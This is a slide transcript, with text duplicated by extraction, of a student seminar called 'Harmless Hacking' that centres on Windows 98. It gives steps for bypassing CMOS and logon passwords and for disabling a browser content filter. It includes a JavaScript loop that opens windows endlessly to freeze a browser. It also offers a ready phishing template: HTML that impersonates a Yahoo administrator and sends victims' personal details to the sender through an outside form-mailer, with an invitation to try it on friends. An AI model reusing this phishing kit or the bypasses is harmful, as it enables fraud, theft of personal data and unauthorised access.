seminar on hacking

34
PRESENTATION PRESENTATION ON ON Harmless Hacking Harmless Hacking BY : BY : SHIV GOPAL TIWARI SHIV GOPAL TIWARI B.Sc. I.T.3/17 B.Sc. I.T.3/17 Think Beyond The Boundaries…

Upload: anon-531993

Post on 10-Apr-2015

7.591 views

Category:

Documents


6 download

DESCRIPTION

seminar at hacking win98

TRANSCRIPT

Page 1: Seminar on Hacking

PRESENTATION PRESENTATION ONON

Harmless HackingHarmless Hacking

BY :BY : SHIV GOPAL TIWARISHIV GOPAL TIWARI

B.Sc. I.T.3/17B.Sc. I.T.3/17

Think Beyond The Boundaries…

Page 2: Seminar on Hacking

04/11/2304/11/23 22

PrerequisitesPrerequisites

What is Harmless Hacking; who are Hackers?What is Harmless Hacking; who are Hackers? General Features of Hacking.General Features of Hacking. Knowledge of Operating System(Windows98).Knowledge of Operating System(Windows98). Basic Knowledge of Hardware.Basic Knowledge of Hardware. A Computer with minimum configuration as:A Computer with minimum configuration as:

-A 486 Processor.-A 486 Processor.

-A 32 Mb RAM.-A 32 Mb RAM.

-An Internet Service Provider.-An Internet Service Provider.

Page 3: Seminar on Hacking

04/11/2304/11/23 33

IntroductionIntroduction

The word hacker is used in two different ways:The word hacker is used in two different ways:

1.Hacker is merely enthusiast of any kind ,who love working on 1.Hacker is merely enthusiast of any kind ,who love working on computer.computer.

2.Hacker or cracker which hack computer with bad intentions.2.Hacker or cracker which hack computer with bad intentions.

Hacking consist of attempting to make unauthorized entry Hacking consist of attempting to make unauthorized entry into computers and explore what is there.into computers and explore what is there.

The main aim and purpose is widely misunderstood, most The main aim and purpose is widely misunderstood, most hackers are not interested in doing massive frauds, modify hackers are not interested in doing massive frauds, modify personnel banking, taxation and employee records.personnel banking, taxation and employee records.

The aim of seminar is merely to give you some grasp of The aim of seminar is merely to give you some grasp of methodology, help you to develop the appropriate attitude and methodology, help you to develop the appropriate attitude and skills and point you in right direction for more knowledge.skills and point you in right direction for more knowledge.

Page 4: Seminar on Hacking

04/11/2304/11/23 44

Learning ObjectivesLearning Objectives Hacking windows98Hacking windows98

-Editing Windows Registry.-Editing Windows Registry.-Enhance windows by modifying System -Enhance windows by modifying System

Files.Files.-How to hack your Pentium CMOS password. -How to hack your Pentium CMOS password. -Several ways to hack your Windows 98 logon -Several ways to hack your Windows 98 logon password. password.

Blocking ProgramsBlocking Programs

Mail BombingMail Bombing              

Psychological HackingPsychological Hacking -Hacking Password -Hacking Password

Page 5: Seminar on Hacking

04/11/2304/11/23 55

Registry EditorRegistry Editor Registry: The Registry is hierarchical database Registry: The Registry is hierarchical database

that contain virtually all information of your that contain virtually all information of your computercomputer ..

Registry Editor: The registry editor is a utility Registry Editor: The registry editor is a utility allow you to see, search, modify and save the allow you to see, search, modify and save the registry database of windows.registry database of windows.

How to run registry Editor?How to run registry Editor?1.1. click on start menuclick on start menu2.2. click on Run.click on Run.3. type regedit.exe under Windows 95,98.3. type regedit.exe under Windows 95,98.4. type regedit32.exe under Windows NT4. type regedit32.exe under Windows NT

Page 6: Seminar on Hacking

04/11/2304/11/23 66

View of Registry EditorView of Registry Editor

Page 7: Seminar on Hacking

04/11/2304/11/23 77

Enhance Windows98Enhance Windows98

Ban Shutdowns.Ban Shutdowns. Disabling Display of Drives.Disabling Display of Drives. Pop a Welcome banner at the time of Pop a Welcome banner at the time of

Login.Login. Customize Right Click of the Start Customize Right Click of the Start

Menu.Menu. Deleting System Options from Start Deleting System Options from Start

Menu.Menu.

Page 8: Seminar on Hacking

04/11/2304/11/23 88

Ban ShutdownBan Shutdown

Step1:Open Registry Editor.Step1:Open Registry Editor.

Step2:click on HKEY_CURRENT_USER\ Software \Microsoft\Step2:click on HKEY_CURRENT_USER\ Software \Microsoft\Windows\Current Version \Policies \Explorer.Windows\Current Version \Policies \Explorer.

Step3:create NoClose key in the right panel.Step3:create NoClose key in the right panel.

step4:Modify NoClose key by typing 1 in value data Box step4:Modify NoClose key by typing 1 in value data Box

Step5:Save by Pressing F5.Step5:Save by Pressing F5.now, see your shutdown option is hidden.now, see your shutdown option is hidden.

Note:-Note:- It will Works only in Windows 98 not in Windows95.It will Works only in Windows 98 not in Windows95.

Page 9: Seminar on Hacking

04/11/2304/11/23 99

Disabling Display of DrivesDisabling Display of Drives

Step 1:Open the Registry Editor.Step 1:Open the Registry Editor.

Step2:Click on HKEY_CURRENT_USER \Software\Microsoft\ Step2:Click on HKEY_CURRENT_USER \Software\Microsoft\ Windows\Current Version\Policies\Explorer.Windows\Current Version\Policies\Explorer.

Step3:Create a new DWORD item and Rename it NoDrives.Step3:Create a new DWORD item and Rename it NoDrives.

Step4:Modify it values and set 3FFFFFF(hexadecimal).Step4:Modify it values and set 3FFFFFF(hexadecimal).

Step5:Press F5 and Refresh.Step5:Press F5 and Refresh.Now when you click on My Computer it will not Show Now when you click on My Computer it will not Show

your Drives.your Drives.

Page 10: Seminar on Hacking

04/11/2304/11/23 1010

Popup BannerPopup Banner

Step1: Open Registry Editor.Step1: Open Registry Editor.Step2:Click on HKEY_LOCAL_MACHINE \Software \Step2:Click on HKEY_LOCAL_MACHINE \Software \

Microsoft\ Windows\Current Version\ WinLogon.Microsoft\ Windows\Current Version\ WinLogon.Step3:now, Create new String Value and rename it Step3:now, Create new String Value and rename it

LegalNoticeCaption.LegalNoticeCaption.Step4:Enter the value you want to see in the menu bar.Step4:Enter the value you want to see in the menu bar.Step4: Create new String Value and rename it Step4: Create new String Value and rename it

LegalNoticeText.LegalNoticeText.Step5:Insert the message you want to display.Step5:Insert the message you want to display.

now you will see popup banner at the time of now you will see popup banner at the time of logon.logon.

Page 11: Seminar on Hacking

04/11/2304/11/23 1111

Customize Right Click of Start MenuCustomize Right Click of Start Menu

Step1:open Registry editor.Step1:open Registry editor.Step2:Click on HKEY_CLASSES_ROOT\Directory\ ShellStep2:Click on HKEY_CLASSES_ROOT\Directory\ ShellStep3:Right click on Shell and Create a new Sub key name Step3:Right click on Shell and Create a new Sub key name

it by typing application name.it by typing application name.Step4:Right Click on new subkey and create new subkey Step4:Right Click on new subkey and create new subkey

as command.as command.Step5: Enter full path of Application in Right panel.Step5: Enter full path of Application in Right panel.Step6: save and Refresh.Step6: save and Refresh.

now it will be placed on the right click popup now it will be placed on the right click popup menu.menu.

Page 12: Seminar on Hacking

04/11/2304/11/23 1212

ViewView

Page 13: Seminar on Hacking

04/11/2304/11/23 1313

Deleting Options from Start MenuDeleting Options from Start Menu

Step1:Open Registry Editor.Step1:Open Registry Editor.

Step2:Click on HKEY_CURRENT_USER \Software \Step2:Click on HKEY_CURRENT_USER \Software \Microsoft\ Windows\Current Version\Policies\Explorer.Microsoft\ Windows\Current Version\Policies\Explorer.

Step3:Create new DWORD value and Name it NoFind.Step3:Create new DWORD value and Name it NoFind.

Step4:Edit the value from 0 to 1.Step4:Edit the value from 0 to 1.

This will disable Find option from start menu and This will disable Find option from start menu and also disable shortcut key.also disable shortcut key.

Page 14: Seminar on Hacking

04/11/2304/11/23 1414

Hacking CMOS PasswordHacking CMOS Password

Step one: Get a screwdriver.Step one: Get a screwdriver.

Step two: open up your victim i.e. your CPU. Step two: open up your victim i.e. your CPU.

Step three: remove the battery . Step three: remove the battery .

Step four: plug the battery back in after 30secs. Step four: plug the battery back in after 30secs.

Alternate step three: many motherboards have a 3 pin jumper to reset Alternate step three: many motherboards have a 3 pin jumper to reset the CMOS to its default settings. Look for a jumper close to the battery the CMOS to its default settings. Look for a jumper close to the battery or look at your manual if you have one. or look at your manual if you have one.

For example, you might find a three pin device with pins one and two For example, you might find a three pin device with pins one and two jumper. If you move the jumper to pins two and three and leave it jumper. If you move the jumper to pins two and three and leave it there for over five seconds, it may reset the CMOS. Warning -- this will there for over five seconds, it may reset the CMOS. Warning -- this will not work on all computers! not work on all computers!

Step five: Your victim computer now hopefully has the CMOS default Step five: Your victim computer now hopefully has the CMOS default settings.settings.

Page 15: Seminar on Hacking

04/11/2304/11/23 1515

Hacking CMOS PasswordHacking CMOS Password

There is an another method to crack the Bios There is an another method to crack the Bios password .password .

There is the simple “debug ” command which There is the simple “debug ” command which allow us to do.allow us to do.

To clear the CMOS do the following:To clear the CMOS do the following:GO to Dos and typeGO to Dos and type

DEBUG hit enterDEBUG hit enter-o 70 2e hit enter-o 70 2e hit enter-o 71 ff hit enter-o 71 ff hit enter-q hit enter-q hit enterexit hit enterexit hit enter

Page 16: Seminar on Hacking

04/11/2304/11/23 1616

Hacking Windows 98Hacking Windows 98

To edit start Button…To edit start Button…

Step 1: Restart your Computer in MSDOS mode.Step 1: Restart your Computer in MSDOS mode.

Step 2: Go to the Windows directory.Step 2: Go to the Windows directory.

Step 3: Open the file ”explorer.exe” in dos editor mode. Step 3: Open the file ”explorer.exe” in dos editor mode. (The screen is full of weird characters) with 70 letters in (The screen is full of weird characters) with 70 letters in the columns.the columns.

Step 4 : Go to the Desired line and change it according Step 4 : Go to the Desired line and change it according to you.to you.

Page 17: Seminar on Hacking

04/11/2304/11/23 1717

ViewView

Page 18: Seminar on Hacking

04/11/2304/11/23 1818

Hacking Windows 98Hacking Windows 98

Easy Win 9x Breaking #1: Easy Win 9x Breaking #1:

Step one: boot up your computer. Step one: boot up your computer.

Step two: When the "system configuration" screen comes up, Step two: When the "system configuration" screen comes up, press the "F5" key. If your system doesn't show this screen, press the "F5" key. If your system doesn't show this screen, just keep on pressing the F5 key. just keep on pressing the F5 key.

If your Win 98 has the right settings, this boots you into "safe If your Win 98 has the right settings, this boots you into "safe mode." Everything looks weird, but you don't have to give mode." Everything looks weird, but you don't have to give your password and you still can run your programs. your password and you still can run your programs.

Too easy! OK, if you want to do something that looks a little Too easy! OK, if you want to do something that looks a little classier, here's another way to evade that new password. classier, here's another way to evade that new password.

Page 19: Seminar on Hacking

04/11/2304/11/23 1919

Hacking Windows 98Hacking Windows 98 Easy Win 9x Breaking #2: Easy Win 9x Breaking #2:

Step one: Boot up. Step one: Boot up.

Step two: when you get to the "system configuration" screen, press the F8 Step two: when you get to the "system configuration" screen, press the F8 key. This gives you the Microsoft Windows 95 Startup Menu. key. This gives you the Microsoft Windows 95 Startup Menu.

Step three: choose number 7. This puts you into MS-DOS. At the prompt, Step three: choose number 7. This puts you into MS-DOS. At the prompt, give the command "rename c:\windows\*pwl c:\windows\*zzz." give the command "rename c:\windows\*pwl c:\windows\*zzz."

Step four: reboot. You will get the password dialog screen. You can then Step four: reboot. You will get the password dialog screen. You can then fake out your friends by entering any darn password you want. It will ask fake out your friends by entering any darn password you want. It will ask you to reenter it to confirm your new password. you to reenter it to confirm your new password.

Step five. Your friends are smart enough to suspect you just created a new Step five. Your friends are smart enough to suspect you just created a new password, huh? Well, you can put the old one your friends picked. Again password, huh? Well, you can put the old one your friends picked. Again come to MS-DOS -- to rename *.zzz back to *.pwl. come to MS-DOS -- to rename *.zzz back to *.pwl.

step six: reboot and let your friends use their secret password. It still step six: reboot and let your friends use their secret password. It still works! works!

Page 20: Seminar on Hacking

04/11/2304/11/23 2020

Editing RegistryEditing Registry Step one: Back up all your files. Have a boot disk handy. If you mess up Step one: Back up all your files. Have a boot disk handy. If you mess up

the Registry badly enough you may have to reinstall your operating the Registry badly enough you may have to reinstall your operating system. system.

Step two: Run Regedit.exe Click on it. It brings up several folders: Step two: Run Regedit.exe Click on it. It brings up several folders: -HKEY_CLASSES_ROOT -HKEY_CLASSES_ROOT -HKEY_CURRENT_USER -HKEY_CURRENT_USER -HKEY_LOCAL_MACHINE -HKEY_LOCAL_MACHINE -HKEY_USERS -HKEY_USERS -HKEY_CURRENT_CONFIG -HKEY_CURRENT_CONFIG -HKEY_DYN_DATA -HKEY_DYN_DATA

Step three: Get into one of these HKEY things. Let's check out Step three: Get into one of these HKEY things. Let's check out CURRENT_USER by clicking the plus sign to the left of it. Play around CURRENT_USER by clicking the plus sign to the left of it. Play around awhile. You'll soon realize that Microsoft is babysitting you. All you see is awhile. You'll soon realize that Microsoft is babysitting you. All you see is pictures with no clues. pictures with no clues.

Step four. Now act like real hackers. We are going to put part of the Step four. Now act like real hackers. We are going to put part of the Registry where we can see and change anything. First click the Registry where we can see and change anything. First click the HKEY_CLASSES_ROOT line to highlight it. Then go up to the Regedit menu HKEY_CLASSES_ROOT line to highlight it. Then go up to the Regedit menu bar. Click it, then choose Export Registry File. with extension .reg.bar. Click it, then choose Export Registry File. with extension .reg.

Page 21: Seminar on Hacking

04/11/2304/11/23 2121

Editing RegistryEditing Registry Step five. Open that part of the Registry in Word Pad. One way is to right click Step five. Open that part of the Registry in Word Pad. One way is to right click

on it from Explorer. on it from Explorer. IMPORTANT WARNING: if you left click on it, it will automatically import it back IMPORTANT WARNING: if you left click on it, it will automatically import it back

into the Registry. If you were messing with it and accidentally left click, you into the Registry. If you were messing with it and accidentally left click, you could trash your computer big time. could trash your computer big time.

Step six: Read everything you ever wanted to know about Windows security Step six: Read everything you ever wanted to know about Windows security that Microsoft was afraid to let you find out. Things that look like: that Microsoft was afraid to let you find out. Things that look like:

[ [HKEY_CLASSES_ROOT\htmlctl.PasswordCtl.1] [ [HKEY_CLASSES_ROOT\htmlctl.PasswordCtl.1] @="PasswordCtl Object" @="PasswordCtl Object"

[HKEY_CLASSES_ROOT\htmlctl.PasswordCtl.1\CLSID] [HKEY_CLASSES_ROOT\htmlctl.PasswordCtl.1\CLSID] @="{EE230860-5A5F-11CF-8B11-00AA00C00903}" @="{EE230860-5A5F-11CF-8B11-00AA00C00903}"

The stuff inside the brackets in this last line is an encrypted password The stuff inside the brackets in this last line is an encrypted password controlling access to a program or features of a program such as the net controlling access to a program or features of a program such as the net censorship feature of Internet Explorer. censorship feature of Internet Explorer.

Step seven: It isn't real obvious which password goes to what program. You can Step seven: It isn't real obvious which password goes to what program. You can say delete them all! Of course this means your stored passwords for logging on say delete them all! Of course this means your stored passwords for logging on to your ISP, for example, may disappear. Also, Internet Explorer will pop up with to your ISP, for example, may disappear. Also, Internet Explorer will pop up with a warning that "Content Advisor configuration information is missing. Someone a warning that "Content Advisor configuration information is missing. Someone may have tried to tamper with it." This will look really bad.may have tried to tamper with it." This will look really bad.

Page 22: Seminar on Hacking

04/11/2304/11/23 2222

Editing RegistryEditing Registry

Step eight (optional): Want to erase your surfing records? For Internet Explorer Step eight (optional): Want to erase your surfing records? For Internet Explorer you'll have to edit HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE and you'll have to edit HKEY_CURRENT_USER, HKEY_LOCAL_MACHINE and HKEY_USERS. You can also delete the files c:\windows\cookies \ mm2048.dat HKEY_USERS. You can also delete the files c:\windows\cookies \ mm2048.dat and c:\windows\cookies\mm256.dat. These also store URL data. and c:\windows\cookies\mm256.dat. These also store URL data.

Step nine. Import your .reg files back into the Registry. Either click on your .reg Step nine. Import your .reg files back into the Registry. Either click on your .reg files in Explorer or else use the "Import" feature next to the "Export" you just files in Explorer or else use the "Import" feature next to the "Export" you just used in Regedit. This only works if you remembered to name them with the .reg used in Regedit. This only works if you remembered to name them with the .reg extension. extension.

Step nine: Oh, no, Internet Explorer makes this loud obnoxious noise the first Step nine: Oh, no, Internet Explorer makes this loud obnoxious noise the first time I run it and puts up a bright red "X" with the message that I tampered with time I run it and puts up a bright red "X" with the message that I tampered with the net nanny feature! It looks bad.the net nanny feature! It looks bad.

Erase the Registry and its backups. These are in four files: system.dat, user.dat, Erase the Registry and its backups. These are in four files: system.dat, user.dat, and their backups, system.da0 and user.da0. Your operating system will and their backups, system.da0 and user.da0. Your operating system will immediately commit suicide.immediately commit suicide.

Now, use bootable floppy and install windows98 again.Now, use bootable floppy and install windows98 again.

Now,your Now,your censorship program is not enabled.censorship program is not enabled.

Page 23: Seminar on Hacking

04/11/2304/11/23 2323

Blocking ProgramsBlocking Programs

The Programs Blocks your System operations either The Programs Blocks your System operations either blocking your RAM or any other device As example this blocking your RAM or any other device As example this code.code.

<html><html><body><body><script language="javascript"><script language="javascript">while(1)while(1){{w1=window.open();w1=window.open();w1.document.write("<center><font color=red size=5> w1.document.write("<center><font color=red size=5>

blaaaast!!</font></center>");blaaaast!!</font></center>");}}</script></script></body></body></html></html>

Page 24: Seminar on Hacking

04/11/2304/11/23 2424

Blocking ProgramsBlocking Programs

This code will generate window given below:This code will generate window given below:

Page 25: Seminar on Hacking

04/11/2304/11/23 2525

Blocking ProgramsBlocking Programs When you will click on blast! Hyperlink it When you will click on blast! Hyperlink it

will generate this…will generate this…

Page 26: Seminar on Hacking

04/11/2304/11/23 2626

Mail BombingMail Bombing

Mail bombing means to send Mail bombing means to send huge number of e-mails (may be huge number of e-mails (may be hundreds thousands or million) to a hundreds thousands or million) to a single e-mail account, so that the single e-mail account, so that the maximum spacemaximum space of account is filled of account is filled up and owner of account can’t up and owner of account can’t receive any new messages that come receive any new messages that come .if his inbox is filled with so many new .if his inbox is filled with so many new useless messages, that he cannot useless messages, that he cannot even read the existing messages and even read the existing messages and deleting all the useless messages deleting all the useless messages takes up a lot of valuable time.takes up a lot of valuable time.

Page 27: Seminar on Hacking

04/11/2304/11/23 2727

Types of Mail bombingTypes of Mail bombing

There are two types of mail bombingThere are two types of mail bombing1. Mass Mail Bombing.1. Mass Mail Bombing.2. List Linking.2. List Linking.

Mass Mail Bombing:- In these method the victim’s inbox is Mass Mail Bombing:- In these method the victim’s inbox is flooded with a huge number of the same emails.flooded with a huge number of the same emails.

List Linking:- In these method the victim’s inbox is subscribed List Linking:- In these method the victim’s inbox is subscribed to thousands of mailing list whose subjects are different.to thousands of mailing list whose subjects are different.

Note: The method of mail bombing now a days not in use Note: The method of mail bombing now a days not in use

because capacity of mail boxes is very big so, it is difficult. because capacity of mail boxes is very big so, it is difficult.

Page 28: Seminar on Hacking

04/11/2304/11/23 2828

Psychological HackingPsychological Hacking                              Most of the hackers study the psychology of a computer user Most of the hackers study the psychology of a computer user

and use it for hacking. These hackers are very harm full and can be and use it for hacking. These hackers are very harm full and can be found anywhere in chat or discussion group etc. They email you found anywhere in chat or discussion group etc. They email you saying that they want to gift you a heavy amount and take all your saying that they want to gift you a heavy amount and take all your personal or credit card information for further scamming. Here is an personal or credit card information for further scamming. Here is an good example on Psychology in hacking. In this example hacker's good example on Psychology in hacking. In this example hacker's email address is [email protected] (not associated to any email address is [email protected] (not associated to any YAHOOYAHOO official). Hacker sends a mail (in html format) to the user as a official). Hacker sends a mail (in html format) to the user as a Yahoo. COM administrative official telling that Yahoo server had a Yahoo. COM administrative official telling that Yahoo server had a technical failure due to which Yahoo User database is destroyed so technical failure due to which Yahoo User database is destroyed so you are requested to fill your personal information in given form to you are requested to fill your personal information in given form to prevent Mail-box cancellation. prevent Mail-box cancellation.

              In this way, when user submits the form given in In this way, when user submits the form given in the mail the information reaches to hacker's mail box, and you are the mail the information reaches to hacker's mail box, and you are hacked!!!. Do you want to try it to your friend? ,If yes then, compose hacked!!!. Do you want to try it to your friend? ,If yes then, compose an email with subject like "URGENT MAIL" or "NOTICE" etc. Select and an email with subject like "URGENT MAIL" or "NOTICE" etc. Select and Copy the code given below in the text area and paste it in message Copy the code given below in the text area and paste it in message body of your mail and send it as HTML to your friend. But don't forget body of your mail and send it as HTML to your friend. But don't forget to replace to replace [email protected]@mailserver.com with your own email address and with your own email address and "Please enter your details in the given form""Please enter your details in the given form" with your own message with your own message to your friend. to your friend.

Page 29: Seminar on Hacking

04/11/2304/11/23 2929

Psychological HackingPsychological Hacking <HTML><HTML> <BODY><BODY> <table bgColor=#000000 align=center cellpadding=5><table bgColor=#000000 align=center cellpadding=5> <tr><tr> <td bgColor=#ffffff width=400 height=350 align=left valign=top><td bgColor=#ffffff width=400 height=350 align=left valign=top> <p align="justify"><font color=#000000 face=Arial size=2><p align="justify"><font color=#000000 face=Arial size=2> Dear friend,<br> Dear friend,<br> <!-- COMMENT: Replace the message text given below with your suitable message to friend --><!-- COMMENT: Replace the message text given below with your suitable message to friend --> Please enter your details in given form.Please enter your details in given form. </font></p></font></p> <FORM action="http://www.response-o-matic.com/cgi-bin/rom.pl" method="POST"><FORM action="http://www.response-o-matic.com/cgi-bin/rom.pl" method="POST"> <!-- COMMENT: Replace [email protected] given below with your own mail address--><!-- COMMENT: Replace [email protected] given below with your own mail address--> <INPUT TYPE="hidden" NAME="your_email_address" VALUE="[email protected]"><INPUT TYPE="hidden" NAME="your_email_address" VALUE="[email protected]"> <INPUT TYPE="hidden" NAME="your_name" VALUE="MAIL"><INPUT TYPE="hidden" NAME="your_name" VALUE="MAIL"> <INPUT TYPE="hidden" NAME="email_subject_line" VALUE="MAIL FROM SUBMITTED FORM"><INPUT TYPE="hidden" NAME="email_subject_line" VALUE="MAIL FROM SUBMITTED FORM"> <INPUT TYPE="hidden" NAME="required_fields" VALUE="your_email_address"><INPUT TYPE="hidden" NAME="required_fields" VALUE="your_email_address"> <INPUT TYPE="hidden" NAME="thank_you_title" VALUE="Thank you for submitting information"><INPUT TYPE="hidden" NAME="thank_you_title" VALUE="Thank you for submitting information"> <INPUT TYPE="hidden" NAME="return_link_url" VALUE="http://abhishek.us.ms"><INPUT TYPE="hidden" NAME="return_link_url" VALUE="http://abhishek.us.ms"> <INPUT TYPE="hidden" NAME="return_link_name" VALUE="Click here now"><INPUT TYPE="hidden" NAME="return_link_name" VALUE="Click here now"> <INPUT TYPE="hidden" NAME="background_color" VALUE="#FFFFFF"><INPUT TYPE="hidden" NAME="background_color" VALUE="#FFFFFF"> <INPUT TYPE="hidden" NAME="text_color" VALUE="#000000"><INPUT TYPE="hidden" NAME="text_color" VALUE="#000000"> <INPUT TYPE="hidden" NAME="link_color" VALUE="#0000FF"><INPUT TYPE="hidden" NAME="link_color" VALUE="#0000FF"> <INPUT TYPE="hidden" NAME="visited_link_color" VALUE="#8000FF"><INPUT TYPE="hidden" NAME="visited_link_color" VALUE="#8000FF"> <INPUT TYPE="hidden" NAME="active_link_color" VALUE="#0000FF"><INPUT TYPE="hidden" NAME="active_link_color" VALUE="#0000FF"> <TABLE BORDER=0 CELLSPACING=0> <TABLE BORDER=0 CELLSPACING=0> <TR><TR> <TD WIDTH=116><TD WIDTH=116> <font color=#000000 face=Arial size=2>First name:</font><font color=#000000 face=Arial size=2>First name:</font> </TD></TD> <TD><TD>

Page 30: Seminar on Hacking

04/11/2304/11/23 3030

<INPUT TYPE="text" NAME="First_name" VALUE="" SIZE=20><INPUT TYPE="text" NAME="First_name" VALUE="" SIZE=20> </TD></TD> </TR></TR> <TR><TR> <TD WIDTH=116><TD WIDTH=116> <font color=#000000 face=Arial size=2>Last name:</font><font color=#000000 face=Arial size=2>Last name:</font> </TD></TD> <TD><TD> <INPUT TYPE="text" NAME="Last_name" VALUE="" SIZE=20><INPUT TYPE="text" NAME="Last_name" VALUE="" SIZE=20> </TD></TD> </TR></TR> <TR><TR> <TD WIDTH=200><TD WIDTH=200> <font color=#000000 face=Arial size=2>Email ID:</font><font color=#000000 face=Arial size=2>Email ID:</font> </TD></TD> <TD><TD> <INPUT TYPE="text" NAME="E_mail" VALUE="" SIZE=20><INPUT TYPE="text" NAME="E_mail" VALUE="" SIZE=20> </TD></TD> </TR></TR> <TR><TR> <TD WIDTH=200><TD WIDTH=200> <font color=#000000 face=Arial size=2>Full Postal Address:</font><font color=#000000 face=Arial size=2>Full Postal Address:</font> </TD></TD> <TD><TD> <INPUT TYPE="text" NAME="Postal_address" VALUE="" SIZE=20><INPUT TYPE="text" NAME="Postal_address" VALUE="" SIZE=20> </TD></TD> </TR></TR> <TR><TR> <TD WIDTH=116><TD WIDTH=116> <font color=#000000 face=Arial size=2>Phone no.</font><font color=#000000 face=Arial size=2>Phone no.</font> </TD></TD> <TD><TD> <INPUT TYPE="text" NAME="Phone_no" VALUE="" SIZE=20><INPUT TYPE="text" NAME="Phone_no" VALUE="" SIZE=20> </TD></TD> </TR></TR> </TABLE></TABLE> <center><INPUT TYPE="submit" NAME="Submit" VALUE="Submit"><INPUT TYPE="reset" VALUE="Reset"></center><center><INPUT TYPE="submit" NAME="Submit" VALUE="Submit"><INPUT TYPE="reset" VALUE="Reset"></center> </FORM></td></tr></table></body></html></FORM></td></tr></table></body></html>

Psychological HackingPsychological Hacking

Page 31: Seminar on Hacking

04/11/2304/11/23 3131

View of FormView of Form

Page 32: Seminar on Hacking

04/11/2304/11/23 3232

Ethics and SafetyEthics and Safety Don't ever maliciously hack a system. Don't ever maliciously hack a system. Do not delete or modify files unnecessarily, or Do not delete or modify files unnecessarily, or

intentionally slow down or crash a system.intentionally slow down or crash a system. Don't use codes from your own home, ever! Period.Don't use codes from your own home, ever! Period. Watch what you post. Don't post accounts or codes over Watch what you post. Don't post accounts or codes over

open nets as a rule.They will die within days, and you will open nets as a rule.They will die within days, and you will lose your new treasure.lose your new treasure.

Don't play tricks to others, no matter how bad you hate Don't play tricks to others, no matter how bad you hate them.them.

Make the tracking of yourself as difficult as possible for Make the tracking of yourself as difficult as possible for others.others.

Page 33: Seminar on Hacking

04/11/2304/11/23 3333

BIBILOGRAPHYBIBILOGRAPHY

Ethical Hacking by Ankit FadiaEthical Hacking by Ankit Fadia The Hackers Handbook Hugo Cornwall.The Hackers Handbook Hugo Cornwall. Beginner Guide to Hacking by Carolyn meinelBeginner Guide to Hacking by Carolyn meinel

Websites:Websites: http://www.eskimo.com/~nwps/index.html http://www.eskimo.com/~nwps/index.html http://www.geocities.com/siliconvalley/park/2613/links.html http://www.geocities.com/siliconvalley/park/2613/links.html http://www.ilf.net/Toast/ http://www.ilf.net/Toast/ http://www.islandnet.com/~cliffmcc http://www.islandnet.com/~cliffmcc http://www.simtel.net/simtel.net http://www.simtel.net/simtel.net http://www.supernet.net/cwsapps/cwsa.html http://www.supernet.net/cwsapps/cwsa.html http://www.trytel.com/hack/ http://www.trytel.com/hack/ http://www.tucows.com http://www.tucows.com http://www.windows95.com/apps/ http://www.windows95.com/apps/ http://www2.southwind.net/%7emiker/hack.html http://www2.southwind.net/%7emiker/hack.html

Page 34: Seminar on Hacking

04/11/2304/11/23 3434

Thank U for your time.Thank U for your time.

QUERIESQUERIES

THANK-YOU…THANK-YOU…